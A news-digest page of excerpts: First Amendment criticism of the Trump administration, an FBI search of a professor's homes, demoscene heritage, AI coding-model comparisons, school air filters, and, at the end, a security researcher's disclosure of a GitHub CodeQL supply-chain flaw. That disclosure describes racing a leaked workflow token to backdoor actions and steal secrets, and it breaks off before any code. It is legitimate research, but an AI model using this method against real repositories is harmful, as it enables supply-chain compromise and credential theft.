10 interesting stories served every morning and every evening.
“Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.” -U. S. Constitution, First Amendment.
In an address to Congress this month, President Trump claimed he had “brought free speech back to America.” But barely two months into his second term, the president has waged an unprecedented attack on the First Amendment rights of journalists, students, universities, government workers, lawyers and judges.
This story explores a slew of recent actions by the Trump administration that threaten to undermine all five pillars of the First Amendment to the U. S. Constitution, which guarantees freedoms concerning speech, religion, the media, the right to assembly, and the right to petition the government and seek redress for wrongs.
The right to petition allows citizens to communicate with the government, whether to complain, request action, or share viewpoints — without fear of reprisal. But that right is being assaulted by this administration on multiple levels. For starters, many GOP lawmakers are now heeding their leadership’s advice to stay away from local town hall meetings and avoid the wrath of constituents affected by the administration’s many federal budget and workforce cuts.
Another example: President Trump recently fired most of the people involved in processing Freedom of Information Act (FOIA) requests for government agencies. FOIA is an indispensable tool used by journalists and the public to request government records, and to hold leaders accountable.
The biggest story by far this week was the bombshell from The Atlantic editor Jeffrey Goldberg, who recounted how he was inadvertently added to a Signal group chat with National Security Advisor Michael Waltz and 16 other Trump administration officials discussing plans for an upcoming attack on Yemen.
One overlooked aspect of Goldberg’s incredible account is that by planning and coordinating the attack on Signal — which features messages that can auto-delete after a short time — administration officials were evidently seeking a way to avoid creating a lasting (and potentially FOIA-able) record of their deliberations.
“Intentional or not, use of Signal in this context was an act of erasure—because without Jeffrey Goldberg being accidentally added to the list, the general public would never have any record of these communications or any way to know they even occurred,” Tony Bradley wrote this week at Forbes.
Petitioning the government, particularly when it ignores your requests, often requires challenging federal agencies in court. But that becomes far more difficult if the most competent law firms start to shy away from cases that may involve crossing the president and his administration.
On March 22, the president issued a memorandum that directs heads of the Justice and Homeland Security Departments to “seek sanctions against attorneys and law firms who engage in frivolous, unreasonable and vexatious litigation against the United States,” or in matters that come before federal agencies.
The POTUS recently issued several executive orders railing against specific law firms with attorneys who worked legal cases against him. On Friday, the president announced that the law firm of Skadden, Arps, Slate, Meager & Flom had agreed to provide $100 million in pro bono work on issues that he supports.
Trump issued another order naming the firm Paul, Weiss, Rifkind, Wharton & Garrison, which ultimately agreed to pledge $40 million in pro bono legal services to the president’s causes.
Other Trump executive orders targeted law firms Jenner & Block and WilmerHale, both of which have attorneys that worked with special counsel Robert Mueller on the investigation into Russian interference in the 2016 election. But this week, two federal judges in separate rulings froze parts of those orders.
“There is no doubt this retaliatory action chills speech and legal advocacy, and that is qualified as a constitutional harm,” wrote Judge Richard Leon, who ruled against the executive order targeting WilmerHale.
President Trump recently took the extraordinary step of calling for the impeachment of federal judges who rule against the administration. Trump called U. S. District Judge James Boasberg a “Radical Left Lunatic” and urged he be removed from office for blocking deportation of Venezuelan alleged gang members under a rarely invoked wartime legal authority.
In a rare public rebuke to a sitting president, U. S. Supreme Court Justice John Roberts issued a statement on March 18 pointing out that “For more than two centuries, it has been established that impeachment is not an appropriate response to disagreement concerning a judicial decision.”
The U. S. Constitution provides that judges can be removed from office only through impeachment by the House of Representatives and conviction by the Senate. The Constitution also states that judges’ salaries cannot be reduced while they are in office.
Undeterred, House Speaker Mike Johnson this week suggested the administration could still use the power of its purse to keep courts in line, and even floated the idea of wholesale eliminating federal courts.
“We do have authority over the federal courts as you know,” Johnson said. “We can eliminate an entire district court. We have power of funding over the courts, and all these other things. But desperate times call for desperate measures, and Congress is going to act, so stay tuned for that.”
President Trump has taken a number of actions to discourage lawful demonstrations at universities and colleges across the country, threatening to cut federal funding for any college that supports protests he deems “illegal.”
A Trump executive order in January outlined a broad federal crackdown on what he called “the explosion of antisemitism” on U. S. college campuses. This administration has asserted that foreign students who are lawfully in the United States on visas do not enjoy the same free speech or due process rights as citizens.
Reuters reports that the acting civil rights director at the Department of Education (DOE) on March 10 sent letters to 60 educational institutions warning they could lose federal funding if they don’t do more to combat anti-semitism. On March 20, Trump issued an order calling for the closure of the DOE.
Meanwhile, U. S. Immigration and Customs Enforcement (ICE) agents have been detaining and trying to deport pro-Palestinian students who are legally in the United States. The administration is targeting students and academics who spoke out against Israel’s attacks on Gaza, or who were active in campus protests against U.S. support for the attacks. Secretary of State Marco Rubio told reporters Thursday that at least 300 foreign students have seen their visas revoked under President Trump, a far higher number than was previously known.
In his first term, Trump threatened to use the national guard or the U. S. military to deal with protesters, and in campaigning for re-election he promised to revisit the idea.
“I think the bigger problem is the enemy from within,” Trump told Fox News in October 2024. “We have some very bad people. We have some sick people, radical left lunatics. And I think they’re the big — and it should be very easily handled by, if necessary, by National Guard, or if really necessary, by the military, because they can’t let that happen.”
This term, Trump acted swiftly to remove the top judicial advocates in the armed forces who would almost certainly push back on any request by the president to use U. S. soldiers in an effort to quell public protests, or to arrest and detain immigrants. In late February, the president and Defense Secretary Pete Hegseth fired the top legal officers for the military services — those responsible for ensuring the Uniform Code of Military Justice is followed by commanders.
Military.com warns that the purge “sets an alarming precedent for a crucial job in the military, as President Donald Trump has mused about using the military in unorthodox and potentially illegal ways.” Hegseth told reporters the removals were necessary because he didn’t want them to pose any “roadblocks to orders that are given by a commander in chief.”
President Trump has sued a number of U. S. news outlets, including 60 Minutes, CNN, The Washington Post, The New York Times and other smaller media organizations for unflattering coverage.
In a $10 billion lawsuit against 60 Minutes and its parent Paramount, Trump claims they selectively edited an interview with former Vice President Kamala Harris prior to the 2024 election. The TV news show last month published transcripts of the interview at the heart of the dispute, but Paramount is reportedly considering a settlement to avoid potentially damaging its chances of winning the administration’s approval for a pending multibillion-dollar merger.
The president sued The Des Moines Register and its parent company, Gannett, for publishing a poll showing Trump trailing Harris in the 2024 presidential election in Iowa (a state that went for Trump). The POTUS also is suing the Pulitzer Prize board over 2018 awards given to The New York Times and The Washington Post for their coverage of purported Russian interference in the 2016 election.
Whether or not any of the president’s lawsuits against news organizations have merit or succeed is almost beside the point. The strategy behind suing the media is to make reporters and newsrooms think twice about criticizing or challenging the president and his administration. The president also knows some media outlets will find it more expedient to settle.
Trump also sued ABC News and George Stephanopoulos for stating that the president had been found liable for “rape” in a civil case [Trump was found liable of sexually abusing and defaming E. Jean Carroll]. ABC parent Disney settled that claim by agreeing to donate $15 million to the Trump Presidential Library.
Following the attack on the U. S. Capitol on Jan. 6, 2021, Facebook blocked President Trump’s account. Trump sued Meta, and after the president’s victory in 2024 Meta settled and agreed to pay Trump $25 million: $22 million would go to his presidential library, and the rest to legal fees. Meta CEO Mark Zuckerberg also announced Facebook and Instagram would get rid of fact-checkers and rely instead on reader-submitted “community notes” to debunk disinformation on the social media platform.
Brendan Carr, the president’s pick to run the Federal Communications Commission (FCC), has pledged to “dismantle the censorship cartel and restore free speech rights for everyday Americans.” But on January 22, 2025, the FCC reopened complaints against ABC, CBS and NBC over their coverage of the 2024 election. The previous FCC chair had dismissed the complaints as attacks on the First Amendment and an attempt to weaponize the agency for political purposes.
According to Reuters, the complaints call for an investigation into how ABC News moderated the pre-election TV debate between Trump and Biden, and appearances of then-Vice President Harris on 60 Minutes and on NBC’s “Saturday Night Live.”
Since then, the FCC has opened investigations into NPR and PBS, alleging that they are breaking sponsorship rules. The Center for Democracy & Technology (CDT), a think tank based in Washington, D. C., noted that the FCC is also investigating KCBS in San Francisco for reporting on the location of federal immigration authorities.
“Even if these investigations are ultimately closed without action, the mere fact of opening them — and the implicit threat to the news stations’ license to operate — can have the effect of deterring the press from news coverage that the Administration dislikes,” the CDT’s Kate Ruane observed.
Trump has repeatedly threatened to “open up” libel laws, with the goal of making it easier to sue media organizations for unfavorable coverage. But this week, the U. S. Supreme Court declined to hear a challenge brought by Trump donor and Las Vegas casino magnate Steve Wynn to overturn the landmark 1964 decision in New York Times v. Sullivan, which insulates the press from libel suits over good-faith criticism of public figures.
The president also has insisted on picking which reporters and news outlets should be allowed to cover White House events and participate in the press pool that trails the president. He barred the Associated Press from the White House and Air Force One over their refusal to call the Gulf of Mexico by another name.
And the Defense Department has ordered a number of top media outlets to vacate their spots at the Pentagon, including CNN, The Hill, The Washington Post, The New York Times, NBC News, Politico and National Public Radio.
“Incoming media outlets include the New York Post, Breitbart, the Washington Examiner, the Free Press, the Daily Caller, Newsmax, the Huffington Post and One America News Network, most of whom are seen as conservative or favoring Republican President Donald Trump,” Reuters reported.
Shortly after Trump took office again in January 2025, the administration began circulating lists of hundreds of words that government staff and agencies shall not use in their reports and communications.
The Brookings Institution notes that in moving to comply with this anti-speech directive, federal agencies have purged countless taxpayer-funded data sets from a swathe of government websites, including data on crime, sexual orientation, gender, education, climate, and global development.
The New York Times reports that in the past two months, hundreds of terabytes of digital resources analyzing data have been taken off government websites.
“While in many cases the underlying data still exists, the tools that make it possible for the public and researchers to use that data have been removed,” The Times wrote.
On Jan. 27, Trump issued a memo (PDF) that paused all federally funded programs pending a review of those programs for alignment with the administration’s priorities. Among those was ensuring that no funding goes toward advancing “Marxist equity, transgenderism, and green new deal social engineering policies.”
According to the CDT, this order is a blatant attempt to force government grantees to cease engaging in speech that the current administration dislikes, including speech about the benefits of diversity, climate change, and LGBTQ issues.
“The First Amendment does not permit the government to discriminate against grantees because it does not like some of the viewpoints they espouse,” the CDT’s Ruane wrote. “Indeed, those groups that are challenging the constitutionality of the order argued as much in their complaint, and have won an injunction blocking its implementation.”
On January 20, the same day Trump issued an executive order on free speech, the president also issued an executive order titled “Reevaluating and Realigning United States Foreign Aid,” which froze funding for programs run by the U. S. Agency for International Development (USAID). Among those were programs designed to empower civil society and human rights groups, journalists and others responding to digital repression and Internet shutdowns.
According to the Electronic Frontier Foundation (EFF), this includes many freedom technologies that use cryptography, fight censorship, protect freedom of speech, privacy and anonymity for millions of people around the world.
“While the State Department has issued some limited waivers, so far those waivers do not seem to cover the open source internet freedom technologies,” the EFF wrote about the USAID disruptions. “As a result, many of these projects have to stop or severely curtail their work, lay off talented workers, and stop or slow further development.”
On March 14, the president signed another executive order that effectively gutted the U. S. Agency for Global Media (USAGM), which oversees or funds media outlets including Radio Free Europe/Radio Liberty and Voice of America (VOA). The USAGM also oversees Radio Free Asia, which supporters say has been one of the most reliable tools used by the government to combat Chinese propaganda.
But this week, U. S. District Court Judge Royce Lamberth, a Reagan appointee, temporarily blocked USAGM’s closure by the administration.
“RFE/RL has, for decades, operated as one of the organizations that Congress has statutorily designated to carry out this policy,” Lamberth wrote in a 10-page opinion. “The leadership of USAGM cannot, with one sentence of reasoning offering virtually no explanation, force RFE/RL to shut down — even if the President has told them to do so.”
The Trump administration rescinded a decades-old policy that instructed officers not to take immigration enforcement actions in or near “sensitive” or “protected” places, such as churches, schools, and hospitals.
That directive was immediately challenged in a case brought by a group of Quakers, Baptists and Sikhs, who argued the policy reversal was keeping people from attending services for fear of being arrested on civil immigration violations. On Feb. 24, a federal judge agreed and blocked ICE agents from entering churches or targeting migrants nearby.
The president’s executive order allegedly addressing antisemitism came with a fact sheet that described college campuses as “infested” with “terrorists” and “jihadists.” Multiple faith groups expressed alarm over the order, saying it attempts to weaponize antisemitism and promote “dehumanizing anti-immigrant policies.”
The president also announced the creation of a “Task Force to Eradicate Anti-Christian Bias,” to be led by Attorney General Pam Bondi. Never mind that Christianity is easily the largest faith in America and that Christians are well-represented in Congress.
The Rev. Paul Brandeis Raushenbush, a Baptist minister and head of the progressive Interfaith Alliance, issued a statement accusing Trump of hypocrisy in claiming to champion religion by creating the task force.
“From allowing immigration raids in churches, to targeting faith-based charities, to suppressing religious diversity, the Trump Administration’s aggressive government overreach is infringing on religious freedom in a way we haven’t seen for generations,” Raushenbush said.
A statement from Americans United for Separation of Church and State said the task force could lead to religious persecution of those with other faiths.
“Rather than protecting religious beliefs, this task force will misuse religious freedom to justify bigotry, discrimination, and the subversion of our civil rights laws,” said Rachel Laser, the group’s president and CEO.
Where is President Trump going with all these blatant attacks on the First Amendment? The president has made no secret of his affection for autocratic leaders and “strongmen” around the world, and he is particularly enamored with Hungary’s far-right Prime Minister Viktor Orbán, who has visited Trump’s Mar-a-Lago resort twice in the past year.
A March 15 essay in The Atlantic by Hungarian investigative journalist András Pethő recounts how Orbán rose to power by consolidating control over the courts, and by building his own media universe while simultaneously placing a stranglehold on the independent press.
“As I watch from afar what’s happening to the free press in the United States during the first weeks of Trump’s second presidency — the verbal bullying, the legal harassment, the buckling by media owners in the face of threats — it all looks very familiar,” Pethő wrote. “The MAGA authorities have learned Orbán’s lessons well.”
...
Read the original on krebsonsecurity.com »
A prominent computer scientist who has spent 20 years publishing academic papers on cryptography, privacy, and cybersecurity has gone incommunicado, had his professor profile, email account, and phone number removed by his employer, Indiana University, and had his homes raided by the FBI. No one knows why.
Xiaofeng Wang has a long list of prestigious titles. He was the associate dean for research at Indiana University’s Luddy School of Informatics, Computing and Engineering, a fellow at the Institute of Electrical and Electronics Engineers and the American Association for the Advancement of Science, and a tenured professor at Indiana University at Bloomington. According to his employer, he has served as principal investigator on research projects totaling nearly $23 million over his 21 years there.
He has also co-authored scores of academic papers on a diverse range of research fields, including cryptography, systems security, and data privacy, including the protection of human genomic data. I have personally spoken to him on three occasions for articles here, here, and here.
In recent weeks, Wang’s email account, phone number, and profile page at the Luddy School were quietly erased by his employer. Over the same time, Indiana University also removed a profile for his wife, Nianli Ma, who was listed as a Lead Systems Analyst and Programmer at the university’s Library Technologies division.
As reported by the Bloomingtonian and later the Herald-Times in Bloomington, a small fleet of unmarked cars driven by government agents descended on the Bloomington home of Wang and Ma on Friday. They spent most of the day going in and out of the house and occasionally transferred boxes from their vehicles. TV station WTHR, meanwhile, reported that a second home owned by Wang and Ma and located in Carmel, Indiana, was also searched. The station said that both a resident and an attorney for the resident were on scene during at least part of the search.
...
Read the original on arstechnica.com »
The demoscene has become a national UNESCO-heritage in Sweden, thanks to an application that Ziphoid and me did last year. This has already happened in several European countries, as part of the international Art of Coding initiative to make the demoscene a global UNESCO heritage. I think this makes plenty of sense, since the demoscene is arguably the oldest creative digital subculture around. It has largely stuck to its own values and traditions throughout the world’s technological and economical shifts, and that sort of consistency is quite unusual in the digital world.
The main idea of the demoscene is to compete with productions that maximize a certain hardware, but that’s not what all demosceners like to do. My demogroup Hack n’ Trade for example, cares more about making weird stuff, and there are plenty of other groups like that. Some demosceners don’t release anything at all, but might do important work to keep the scene alive (BBS-trading, organizing parties, preserving software…).
I’ve written plenty of papers and blog posts about the demoscene, and I’ve often felt a gap between the stuff I write as a researcher and my personal experience of the demoscene. There is certainly an international demoscene with big events and huge releases that can be described in general terms, but what has mattered more to me is the local scenes, the small parties and the people you hang out with. Meeting up with a bunch of friends and making weird computer stuff “for no reason, really” is a great setting. That’s what I enjoy the most, in the end. For other sceners, it’s different.
There is a sort of diversity in the scene that is difficult to capture and generalize. The Swedish coder with a well-paid programming job and a busy family life might consider the demoscene as an escape to his teenage years, while the LSD-munching raver from France who trades illegal warez on BBSs and makes weird pixel art considers the scene as a free culture without corporate or art world bullshit. There’s room for both in the scene, because it is werdly conservative and open at the same time. And perhaps that is one of the reasons why it should be considered an intangible heritage.
...
Read the original on www.goto80.com »
Use this service to claim financial reimbursement for a tooth which has been lost and cannot be collected by the Tooth Fairy - for example, teeth which have been:
You can also print and fill in Form TF-230 and leave it under your pillow.
...
Read the original on tf230.matteason.co.uk »
Google just launched Gemini 2.5 Pro on March 26th, claiming to be the best in coding, reasoning and overall everything. But I mostly care about how the model compares against the best available coding model, Claude 3.7 Sonnet (thinking), released at the end of February, which I have been using, and it has been a great experience.
Let’s compare these two coding models and see if I need to change my favourite coding model or if Claude 3.7 still holds.
If you want to jump straight to the conclusion, I’d say go for Gemini 2.5 Pro, it’s better at coding, has one million in context window as compared to Claude’s 200k, and you can get it for free (a big plus). However, Claude’s 3.7 Sonnet is not that far behind. Though at this point there’s no point using it over Gemini 2.5 Pro.
Just an article ago, Claude 3.7 Sonnet was the default answer to every model comparison, and this remained the same for quite some time. But here you go, Gemini 2.5 Pro takes the lead.
Gemini 2.5 Pro, an experimental thinking model, became the talk of the town within a week of its release. Everyone’s talking about this model on Twitter (X) and YouTube. It’s trending everywhere, like seriously. The first model from Google to receive such fanfare.
And it is #1 in the LMArena just like that. But what does this mean? It means that this model is killing all the other models in coding, math, Science, Image understanding, and other areas.
Gemini 2.5 pro comes with a 1 million token context window, with a 2 million context window coming soon. 🤯
You can check out other folks like Theo-t3 talking about this model to get a bit more insight into it:
It is the best coding model to date, with an accuracy of about 63.8% on the SWE bench. This is definitely higher than our previous top coding model, Claude 3.7 Sonnet, which had an accuracy of about 62.3%.
This is a quick demo Google shared on this model of building a dinosaur game.
Here’s a quick benchmark of this model on Reasoning, Mathematics, and Science. This confirms that the model is not just suitable for coding but also for all your other needs. They claim it’s an all-rounder. 🤷♂️
This is all cool, and I’ll confirm the claim, but in this article, I will mainly be comparing the model on coding, and let’s see how well it performs compared to Claude 3.7 Sonnet.
Let’s compare these two models in coding. We’ll do a total of 4 tests, mainly on WebDev, animation and a tricky LeetCode question.
Prompt: Create a simple flight simulator using JavaScript. The simulator should feature a basic plane that can take off from a flat runway. The plane’s movement should be controlled with simple keyboard inputs (e.g., arrow keys or WASD). Additionally, it generates a basic cityscape using blocky structures, similar to Minecraft.
You can find the code it generated here: Link
Here’s the output of the program:
I definitely got exactly what I asked for, with everything functioning, from plane movements to the basic Minecraft-styled block buildings. I can’t really complain about anything here. 10/10 for this one.
You can find the code it generated here: Link
Here’s the output of the program:
I can see some issues with this one. The plane clearly faces sideways, and I don’t know why. Again, it was out of control once it took off and went clearly outside the city. Basically, I’d say we didn’t really get a completely working flight simulator here.
It’s fair to say that Gemini 2.5 really got this correct in one shot. But the issues with the Claude 3.7 Sonnet code aren’t really that big to resolve. Yeah, we didn’t really get the output as expected, and it’s definitely not close to what Gemini 2.5 Pro got us.
This is one of the toughest questions for LLMs. I’ve tried it with many other LLMs, but none could correct it. Let’s see how these two models do this one.
Prompt: Build a simple 3D Rubik’s Cube visualizer and solver in JavaScript using Three.js. The cube should be a 3×3 Rubik’s Cube with standard colours. Have a scramble button that randomly scrambles the cube. Include a solve function that animates the solution step by step. Allow basic mouse controls to rotate the view.
You can find the code it generated here: Link
Here’s the output of the program:
It’s impressive that it could do something this hard in one shot. With the 1 million token context window, I can truly see how powerful this model seems to be.
You can find the code it generated here: Link
Here’s the output of the program:
Again, I was kind of disappointed that it had the same issue as some other LLMs: failing with the colours and completely failing to solve the cube. I did try to help it come up with the answer, but it didn’t really help.
Here again, Gemini 2.5 Pro takes the lead. And the best part is that all of it was done in one shot. Claude 3.7 was really disappointing, as it could not get this one correct, despite being one of the finest coding models out there.
Prompt: Create a simple JavaScript script that visualizes a ball bouncing inside a rotating 4D tesseract. When the ball collides with a side, highlight that side to indicate the impact.
You can find the code it generated here: Link
Here’s the output of the program:
I cannot notice a single issue in the output. The ball and the collision physics all work perfectly, even the part where I asked it to highlight the collision side works. This free model seems to be insane for coding. 🔥
You can find the code it generated here: Link
Here’s the output of the program:
Wow, finally, Claude 3.7 Sonnet got an answer correct. It also added colors to each side, but who asked for it? 🤷♂️ Nevertheless, I can’t really complain much here, as the main functionality seems to work just fine.
The answer is evident this time. Both models got the answer correct, implementing everything I asked for. I won’t really say that I like the output of Claude 3.7 Sonnet more, but it definitely put in quite some work compared to Gemini 2.5 Pro.
For this one, let’s do a quick LeetCode check with to see how these models handle solving a tricky LeetCode question with an acceptance rate of just 14.9%: Maximum Value Sum by Placing 3 Rooks.
Claude 3.7 Sonnet is known to be super good at solving LC questions. If you want to see how Claude 3.7 compares to some top models like Grok 3 and o3-mini-high, check out this blog post:
Given how easily it answered all three of the coding questions we tested, I have quite high hopes for this model.
You can find the code it generated here: Link
It did take quite some time to answer this one, though, and the code it wrote is kind of super complex to make sense of. I think it answered it more complicated than required. But still, the main thing we’re looking for is to see if it can answer it correctly.
As expected, it also answered this tough LeetCode question in one shot. This is one of the questions I got stuck on when learning DSA. I’m not sure if I’m happy it did.
I hope this model will crush this one, as in all the other coding tests I’ve done, Claude 3.7 Sonnet has answered all of the LeetCode questions correctly.
You can find the code it generated here: Link
It did write correct code but got TLE, but if I have to compare the code’s simplicity, I’d say this model made the code simpler and easier to understand.
Gemini 2.5 got the answer correct and also wrote the code in the expected time complexity, but Claude 3.7 Sonnet fell into TLE. If I have to compare the code simplicity, Claude 3.7’s generated code seems to be better.
For me, Gemini 2.5 Pro is the winner. We’ve compared two models that are said to be the best at coding. The big difference I see in the model stats is just that Gemini 2.5 Pro has a slightly higher context window, but let’s not forget that this is an experimental model, and improvements are still on the way.
Google’s been killing it recently with such solid models, previously with the Gemma 3 27B model, a super lightweight model with unbelievable results, and now with this beast of a model, Gemini 2.5 Pro.
By the way, if you are here, Composio is building the skill repository for agents. You can connect LLMs to any application from Gmail to Asana and get things done quickly. You can use MCP servers, or directly add the tools to LLMs in the traditional agentic way.
...
Read the original on composio.dev »
An emergency situation that turned out to be mostly a false alarm led a lot of schools in Los Angeles to install air filters, and something strange happened: Test scores went up. By a lot. And the gains were sustained in the subsequent year rather than fading away.
The impact of the air filters is strikingly large given what a simple change we’re talking about. The school district didn’t reengineer the school buildings or make dramatic education reforms; they just installed $700 commercially available filters that you could plug into any room in the country. But it’s consistent with a growing literature on the cognitive impact of air pollution, which finds that everyone from chess players to baseball umpires to workers in a pear-packing factory suffer deteriorations in performance when the air is more polluted.
And while it’s too hasty to draw sweeping conclusions on the basis of one study, it would be incredibly cheap to have a few cities experiment with installing air filters in some of their schools to get more data and draw clearer conclusions about exactly how much of a difference this makes.
Strikingly, however, air testing conducted around the time of the installation of the filters shows that the schools didn’t actually have abnormally high levels of the kinds of pollution that are normally associated with natural gas. Methane is lighter than air, and by the time the filters were installed — nearly three months after the leak — the extra pollution caused was all the way up in the sky and not affecting school buildings.
Consequently, the installation of the filters served not to remove extra contamination caused by the leak, but simply to clean up the normal amount of background indoor air pollution present in the Valley. That lets Gilraine estimate the difference in student performance for schools just inside the boundary compared to those just outside.
For context, this is comparable in scale to some of the most optimistic studies on the potential benefits of smaller class sizes, with Alan Krueger finding that cutting class size by a third leads to a 0.22 standard deviation improvement in academic performance. Other studies find smaller or even negative effects (because adding teachers means bringing in less experienced or less effective ones), but even accepting the positive findings, it costs much more than $700 per classroom to achieve class size reductions of that scale.
But Sefi Roth of the London School of Economics studied university students’ test performance relative to air pollution levels on the day of the test alone. He found that taking a test in a filtered rather than unfiltered room would raise test scores by 0.09 standard deviations. That’s about half the impact Gilraine found, just based on day-of-test air quality. In Gilraine’s natural experiment, students benefited from cleaner air for about four months. Given that context, it’s not incredibly surprising that you could see an impact that’s about twice as large.
What’s natural to ask — though unknowable from the study before us — is how much more change we could see if students benefited from an entire school year of clean air. Or perhaps an entire school career, from pre-K through high school graduation, of clean air.
One striking thing about this is the government has long been aware that indoor air pollution is a potential problem. But according to currently prevailing Indoor Air Quality standards, there was nothing wrong with the air in the schools. Filters were installed because of an essentially unwarranted panic about natural gas.
And while Los Angeles is a fairly high-pollution part of the country, outdoor particulate levels are higher in many areas — including New York, Chicago, and Houston — than they were in the impacted neighborhood. In other words, there’s no reason to think the impacted schools were unusually deficient in their air quality. They just happen to be the ones that installed filters.
For a sense of scale, Mathematica Policy Research’s best evidence on the effectiveness of the highly touted KIPP charter school network finds that after three years at KIPP there is significant improvement on three out of four test metrics — up 0.25 standard deviations on one English test, 0.22 standard deviations on another, and 0.28 standard deviations on one of two math tests.
This is bigger than the impact of letting kids benefit from clean air for four months. But installing the full suite of air filters costs about $1,000 per classroom, and continuing to operate them beyond the first year is cheaper than that. And best of all, unlike totally reworking school operations, it could be scaled up very quickly.
It would be almost trivially easy to get a variety of school districts all around the country to randomly select schools for the installation of air filters. That would rapidly generate a ton of additional data, and if the results continued to be promising, the initiative could be made universal very quickly.
The benefits, on their face, would be extremely large at a relatively low cost. And since air pollution is generally worse in lower-income communities, you would not only raise test scores nationally, but make progress on the big socioeconomic gaps in student achievement that have proven very difficult to remedy.
...
Read the original on www.vox.com »
A potential supply chain attack on GitHub CodeQL started simply: a publicly exposed secret, valid for 1.022 seconds at a time.
In that second, an attacker could take a series of steps that would allow them to execute code within a GitHub Actions workflow in most repositories using CodeQL, GitHub’s code analysis engine trusted by hundreds of thousands of repositories. The impact would reach both public GitHub (GitHub Cloud) and GitHub Enterprise.
If backdooring GitHub Actions sounds familiar, that’s because it’s exactly what threat actors did in the recent tj-actions/changed-files supply chain attack. Imagine that very same supply chain attack, but instead of backdooring actions in tj-actions, they backdoored actions in GitHub CodeQL.
An attacker could use this to:
Compromise intellectual property by exfiltrating the source code of private repositories using CodeQL.
Steal credentials within GitHub Actions secrets of workflow jobs using CodeQL and leverage those secrets to execute further supply chain attacks.
Compromise GitHub Actions secrets of workflows using the GitHub Actions Cache within a repo that uses CodeQL.
This is the story of how we uncovered an exposed secret leading to a race condition, a potential supply chain attack, and CVE-2025-24362.
Note: Per GitHub’s advisory, they have found no evidence of compromise to its platform or systems.
In January 2025, I took a break from Praetorian’s Red Team and began three months of research. I aimed to push the limits of public GitHub Actions exploitation, building on presentations we’ve given at Black Hat, DEF CON, Schmoocon, and Black Hat Arsenal. Tools and takeaways from this research will be implemented in our CI/CD Professional Services Engagements, and into Chariot, our Continuous Threat Exposure Management platform.
I began my research rotation by scanning GitHub Actions workflow artifacts for secrets.
In August 2024, Palo Alto researcher Yaron Avital published an article about identifying secrets in workflow artifacts. I had a hunch that there were still secrets to be found, especially since there hadn’t been much public follow-up work since the article.
I built a simple Actions Artifacts Secret Scanner to get started. It downloads artifacts from GitHub Actions workflows, recursively extracts their contents, and scans their contents for secrets with Nosey Parker, Praetorian’s open-sourced secrets scanning tool.
The Actions Artifacts Secret Scanner has been integrated into Chariot and open-sourced as a Gato capability.
After running this scanner for one day, it found a secret that could lead to a supply chain attack on GitHub CodeQL.
But first, I needed to see if the key was usable.
CI/CD vulnerabilities sound complicated until you understand the terminology. Let’s catch you up.
GitHub Actions is a continuous integration and continuous delivery (CI/CD) platform that allows the execution of code specified within workflows as part of the CI/CD process. When you push code to a GitHub repository or create a pull request, GitHub Actions can automatically build, test, and deploy your code using workflows defined in YAML files.
For example, let’s say you are building a web application that is hosted in AWS. You can configure a GitHub Actions workflow so that whenever you push code to your repository, it is automatically tested and then deployed to AWS.
If you are new to GitHub Actions, we’d recommend reading through some examples.
Every workflow run generates a GITHUB_TOKEN — a special, automatically generated GitHub App installation token that allows the workflow to interact with the repository. This token’s permissions can be configured in the workflow file, at the repository level, or at the org level, determining what actions it can perform within the repository.
* GitHub runners need a way to authenticate to GitHub to do stuff the workflows tell them to do.
* For that purpose, they use the GITHUB_TOKEN.
If the token has high privileges, then token compromise == bad.
We found the publicly exposed secret in a GitHub Actions workflow artifact.
GitHub Actions workflows can upload workflow “artifacts” to GitHub Actions. Workflow artifacts can be any file and are saved by that workflow for later use. By default, artifacts are publicly accessible to anyone with read access to the repository and are stored for up to 90 days.
CodeQL is GitHub’s Code Analysis Engine. The CodeQL actions perform static code analysis on GitHub repositories to try and identify vulnerabilities. They have found several hundred CVEs over it’s lifetime, protecting organizations from breaches.
Security tools, like CodeQL, often need access to sensitive systems and data, making them an attractive target to an attacker.
If CodeQL was compromised, one of the most widely used security tools now becomes a backdoor.
After running the Actions Artifact Secrets Scanner for a day, it picked up a token in a github/codeql-action repository artifact published by this run. The Actions Artifact Secrets Scanner downloaded the “my-debug-artifacts” zip uploaded by the “PR Check — Debug artifacts after failure” workflow, recursively extracted the “my-db-java-partial.zip” file stored inside, and ran Nosey Parker. Within seconds, Nosey Parker flagged a GitHub Token starting with “ghs_” in a crash report.
Investigating manually, I confirmed this was a GitHub App token installation token stored in a file containing the environment variables of the GitHub Runner executing the workflow.
Secrets compromise is cool, but what can we do with this token? The impact of a compromised
GITHUB_TOKEN is minimal if it only has read permissions.
The easiest way to determine the privileges of a GITHUB_TOKEN is to look at workflow logs. To investigate this, I navigated to the “Setup Job” step of the workflow that uploaded the token.
We could spend a lot of time talking about each privilege, but let’s focus on the ones that are particularly interesting.
Contents: write — Allows the token to create branches, create tags, and upload release artifacts.
Actions: write — Allows you to work with Actions, including trigger workflow_dispatch events.
Packages: write — Allows the token to upload packages.
With these privileges, an attacker has a lot of potential for repository tampering, but there is still one issue. These tokens are only valid for the duration of their specific workflow job. That means that once the job is over, the token is useless. Three things needed to happen for an attacker to be able to abuse this token:
The token needs to have some sort of write privileges (already confirmed).
The token needs to use V4 of the upload artifact API, as that is the only version that allows you to retrieve an artifact before the job is complete (and after the job is complete, the token is invalid.)
The time between uploading the artifact and completing the job needs to be great enough for us to download, extract, and use the token.
If all of these conditions are met, this publicly exposed token could be used to launch a full scale supply chain attack on CodeQL. This was like finding out that the security guard was accidentally leaving their master key in plain sight for a brief moment, over and over again.
We had to determine if the guard left us enough time to steal the key and use it before they returned to their post.
Identifying the artifact upload version is typically straightforward. If a workflow uses
actions/upload-artifact@v4***, we can retrieve the artifact before job completion. If it uses an earlier version, we cannot do so.
In this case, CodeQL wasn’t using the actions/upload-artifact action; they were manually using the upload artifact client in the source code. Code comments indicated it used version 4. That was enough for me to continue.
Now we needed to determine if the job lasted long enough for us to retrieve and use the token.
Looking at the raw GitHub logs for this workflow, we can see two key timestamps:
The final step in the job, “Cleaning up orphan processes”, happened at 17:22:10:911.
That means we had approximately 1.022 seconds to download the artifact, extract the GitHub token, and use it. I noticed the token stayed valid for about a second after the “Cleaning up orphan processes” step, so we’ll call it two seconds.
The guard was giving us two seconds to steal the key and use it before they returned.
Is that enough time for an attacker to use this token? Or is this another theoretical vulnerability?
To test this, I made a Python script artifact_racer.py. Artifact racer performs the following actions.
Continuously queries the github/codeql-action GitHub repository until it sees a “PR Check — Debug artifacts after failure” workflow begin.
Once it sees a “PR Check — Debug artifacts after failure” workflow run, it downloads the artifact and extracts the GITHUB_TOKEN.
